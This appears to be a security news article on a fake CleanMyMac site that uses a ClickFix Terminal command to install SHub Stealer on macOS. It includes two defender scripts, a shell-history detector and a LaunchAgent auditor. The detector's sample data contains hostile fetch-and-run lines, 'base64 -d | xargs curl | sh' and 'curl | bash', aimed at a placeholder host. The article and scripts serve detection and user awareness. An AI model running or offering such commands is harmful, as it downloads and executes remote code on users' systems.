Fake CleanMyMac Website Spreads SHub Stealer Through ClickFix Terminal Trick
Mac users searching for a trusted system optimization tool are being targeted in a new malware campaign that impersonates the popular macOS utility CleanMyMac. Security researchers warn that a fraudulent website is distributing SHub Stealer, a credential-stealing malware capable of harvesting passwords and compromising cryptocurrency wallets.
The campaign relies heavily on social engineering. Instead of exploiting technical vulnerabilities, attackers convince victims to manually run a malicious command in the macOS Terminal, allowing the malware to install while appearing to be part of a legitimate setup process.
A ClickFix-Style Terminal Attack
The attack uses a technique known as ClickFix, in which users are instructed to copy and execute commands themselves. The fake website mimics installation instructions for CleanMyMac and guides visitors through a series of steps that appear routine for developers or advanced users.
Victims are prompted to open Spotlight Search, launch Terminal, paste a provided installation command, and confirm execution by entering their system password. Once the command runs, the malware begins installing silently in the background.
Because the user executes the command manually, and the script is fetched straight from the shell rather than arriving as a quarantined download, macOS security protections such as Gatekeeper (which evaluates quarantined files) may not flag the activity, allowing the malicious script to run without immediate detection.
Hidden Payload Download
Although the Terminal output references the legitimate CleanMyMac website to reassure the user, the command actually decodes a concealed link that downloads a remote script. That script is immediately executed and installs SHub Stealer on the system.
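The two steps just described, a pasted command that decodes a hidden link and a remote script piped straight into the shell, leave a recognisable trace in shell history and process telemetry. The following detector is an added example for defenders, not code from the campaign or from the researchers' report; the history lines are constructed for the demonstration, and the encoded link points at the reserved example.invalid domain so nothing resolves.

```python
import base64
import re

# Constructed sample shell-history lines for the demonstration (not commands
# from the campaign). The base64 blob is generated here from a placeholder URL
# on the reserved example.invalid domain so that nothing resolves.
PLACEHOLDER_URL = "https://example.invalid/setup.sh"
ENCODED_URL = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_HISTORY = [
    "brew install --cask some-utility",
    "ls -la ~/Downloads",
    f"echo {ENCODED_URL} | base64 -d | xargs curl -fsSL | sh",
    "git pull origin main",
    "curl -fsSL https://example.invalid/install.sh | bash",
]

# Decoded base64 content handed to a shell (directly or via xargs/curl).
DECODE_TO_SHELL = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|xargs)\b"
)
# A remote download piped straight into a shell interpreter.
FETCH_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b"
)
# Long base64-looking tokens worth decoding so the analyst sees the real target.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
URL = re.compile(r"https?://\S+")


def decoded_urls(line):
    """Decode any long base64 tokens in the line and return URLs found inside."""
    found = []
    for token in B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: leave it alone
        found.extend(URL.findall(text))
    return found


def classify(line):
    """Return the list of reasons a command line looks like a ClickFix lure."""
    reasons = []
    if DECODE_TO_SHELL.search(line):
        reasons.append("base64-decoded content is piped into a shell")
    if FETCH_TO_SHELL.search(line):
        reasons.append("remote script is downloaded and piped into a shell")
    urls = decoded_urls(line)
    if urls:
        reasons.append("embedded base64 decodes to a URL: " + ", ".join(urls))
    return reasons


def scan_history(lines):
    """Return (line number, line, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            hits.append((number, line, reasons))
    return hits


if __name__ == "__main__":
    for number, line, reasons in scan_history(SAMPLE_HISTORY):
        print(f"line {number}: {line}")
        for reason in reasons:
            print("   -", reason)
```

In practice the lines would come from `~/.zsh_history` (the regexes still match with zsh's `: timestamp:0;` prefix) or from an EDR's process-creation events; decoding the base64 token is what turns an opaque pasted command into an indicator an analyst can block.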
The malware begins by collecting basic information about the infected device, including external IP address, hostname, macOS version, keyboard layout, and a unique identifier assigned to the compromised machine.
Geofencing Avoids Russian Systems
One of the first checks performed by the malware involves detecting the system’s keyboard language settings. If a Russian-language keyboard layout is found, the malware exits immediately and reports the blocked attempt back to its command-and-control infrastructure.
This type of geofencing is commonly used by cybercriminal groups operating in Russian-speaking regions, as avoiding infections within those jurisdictions can reduce the risk of local law enforcement scrutiny.
Password Harvesting Through Fake System Prompts
After the initial installation stage, SHub Stealer attempts to escalate its access by collecting the user’s system password. The malware downloads an AppleScript payload that closes the Terminal window and displays a dialog box that closely resembles a legitimate macOS authentication prompt.
The dialog claims that “System Preferences” requires authentication and requests the user’s password. If entered, the malware verifies the password using macOS system tools and can retry the request multiple times until valid credentials are obtained.
Once attackers obtain the password, they can access the macOS Keychain, which stores saved website passwords, Wi-Fi credentials, application tokens, and private encryption keys.
Targeting Cryptocurrency Wallets
In addition to collecting browser credentials and system data, SHub Stealer specifically targets cryptocurrency wallets installed on macOS devices. Researchers observed the malware modifying several widely used wallet applications, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite.
The modifications enable attackers to display fraudulent security prompts inside the wallet interface. Victims may be asked to enter their recovery seed phrase under the guise of verifying or restoring wallet access. Once entered, the seed phrase is transmitted to attacker-controlled servers, enabling the theft of cryptocurrency funds.
Persistence Through a Fake Google Updater
To maintain long-term access to the infected device, SHub installs a persistent background task using a macOS LaunchAgent. The component is disguised as a Google software updater and configured to run every minute.
Each time it executes, the task launches a hidden script that maintains communication with the attacker’s command-and-control infrastructure, allowing the operators to collect additional data or deliver new commands to the compromised system.
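A LaunchAgent that fires every minute from a user-writable, hidden location under a vendor-sounding label is exactly the kind of entry a periodic audit should surface. The script below is an added example for defenders, not code from the campaign or the report; the two plists are constructed in memory, the label `com.google.updater` is an invented imitation (not a known identifier), and the heuristics are the author's own rather than anything the page specifies.

```python
import plistlib
from pathlib import Path, PurePosixPath

# Locations where legitimately installed programs normally live; anything
# scheduled from elsewhere (home directories, /tmp, hidden folders) deserves a look.
TRUSTED_PREFIXES = ("/Applications/", "/Library/", "/System/", "/usr/", "/bin/", "/sbin/")
INTERPRETERS = {"sh", "bash", "zsh", "/bin/sh", "/bin/bash", "/bin/zsh",
                "osascript", "/usr/bin/osascript"}
VENDOR_WORDS = ("google", "apple", "adobe", "microsoft")
USER_WRITABLE = ("/Users/", "/private/tmp/", "/tmp/")

# Constructed sample plists for the demonstration (not real files).
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/Applications/ExampleBackup.app/Contents/MacOS/backup", "--sync"],
    "StartInterval": 3600,
})
SUSPICIOUS_AGENT = plistlib.dumps({
    "Label": "com.google.updater",  # invented label that merely imitates a vendor
    "ProgramArguments": ["/bin/sh", "/Users/alice/Library/.cache/update.sh"],
    "StartInterval": 60,
    "RunAtLoad": True,
})


def audit_launch_agent(plist_bytes):
    """Return human-readable findings for one LaunchAgent plist (empty if clean)."""
    info = plistlib.loads(plist_bytes)
    findings = []
    label = str(info.get("Label", "")).lower()
    args = list(info.get("ProgramArguments") or [])
    if "Program" in info:
        args.insert(0, info["Program"])

    # Very short intervals are typical of beaconing tasks, not software updaters.
    interval = info.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        findings.append(f"fires every {interval}s (StartInterval)")

    for arg in args:
        if not arg.startswith("/"):
            continue  # flags and option values are not paths
        parts = PurePosixPath(arg).parts[1:]
        if any(part.startswith(".") for part in parts):
            findings.append(f"hidden path component in {arg}")
        if not arg.startswith(TRUSTED_PREFIXES):
            findings.append(f"program outside standard install locations: {arg}")
        if any(word in label for word in VENDOR_WORDS) and arg.startswith(USER_WRITABLE):
            findings.append(f"vendor-named label '{label}' but runs from a user-writable path: {arg}")

    # A signed vendor updater is a binary; a shell or AppleScript interpreter
    # wrapping a script is a common disguise.
    if args and args[0] in INTERPRETERS:
        findings.append(f"job is an interpreter invocation ({args[0]}) rather than a signed binary")
    return findings


def audit_directory(directory):
    """Audit every .plist in a LaunchAgents folder; returns {filename: findings}."""
    results = {}
    for path in Path(directory).expanduser().glob("*.plist"):
        try:
            findings = audit_launch_agent(path.read_bytes())
        except plistlib.InvalidFileException:
            findings = ["unparseable plist"]
        if findings:
            results[path.name] = findings
    return results


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_AGENT), ("suspicious", SUSPICIOUS_AGENT)):
        print(name, "->", audit_launch_agent(sample) or "no findings")
    for name, findings in audit_directory("~/Library/LaunchAgents").items():
        print(name)
        for finding in findings:
            print("   -", finding)
```

Run against `~/Library/LaunchAgents` (per-user) and `/Library/LaunchAgents` (system-wide); the findings are heuristics to prioritise review, so a flagged entry should be checked against the vendor's documented install path and the code signature of the program it launches before removal.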
Growing Targeting of macOS Users
Security researchers note that macOS users are increasingly becoming targets of credential-stealing malware, particularly campaigns focused on cryptocurrency theft and browser session hijacking. Recent incidents have involved malware disguised as AI software installers, podcast invitations, and even browser extensions.
These campaigns highlight a shift in the threat landscape as attackers recognize the growing number of macOS users managing digital assets and sensitive data on their devices.
How Users Can Stay Safe
Security experts recommend downloading software only from official developer websites or the Mac App Store and avoiding installation instructions found on unfamiliar websites. Users should also be cautious about copying and executing commands in Terminal unless they fully trust the source.
As this campaign demonstrates, even a single pasted command can give attackers complete control of a system if it is executed without verification.